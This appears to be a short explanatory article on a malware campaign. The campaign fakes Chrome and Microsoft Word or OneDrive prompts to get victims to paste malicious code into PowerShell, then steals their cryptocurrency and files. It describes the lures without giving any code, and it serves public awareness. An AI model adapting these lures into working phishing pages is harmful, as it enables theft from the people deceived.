PowerShell plays a crucial role in the malware's attack chain as it is used to execute the malicious code downloaded by the user. The attackers behind the malware trick users into opening PowerShell and pasting in the harmful code, which then gains access to the victim's cryptocurrency and sensitive files. By abusing PowerShell, attackers can bypass traditional security measures and hide their malicious activities within legitimate system processes, making detection more challenging3.
The malware impersonates Google Chrome and Microsoft applications by mimicking their update prompts and programs. On Google Chrome, it appears as a fake update prompt on a compromised website, instructing users to copy a code and paste it into PowerShell. For Microsoft applications, it sends emails containing HTML files that resemble Microsoft Word with fake error messages, prompting users to open PowerShell and copy over a malicious code. The malware also mimics Microsoft's cloud storage, OneDrive, for nefarious purposes.
The malware gains access to the victim's cryptocurrencies and sensitive personal information through a multi-stage process. It starts by impersonating Google Chrome and Microsoft updates, prompting users to download a harmful series of code. Once the code is downloaded, the attackers use a Trojan Horse-like method to gain access to the victim's cryptocurrency and sensitive files. The malware reroutes the victim's funds to the attacker and provides them access to personal information. This is achieved through techniques such as clipboard messages and email lures, which trick users into opening PowerShell and pasting in the malicious code.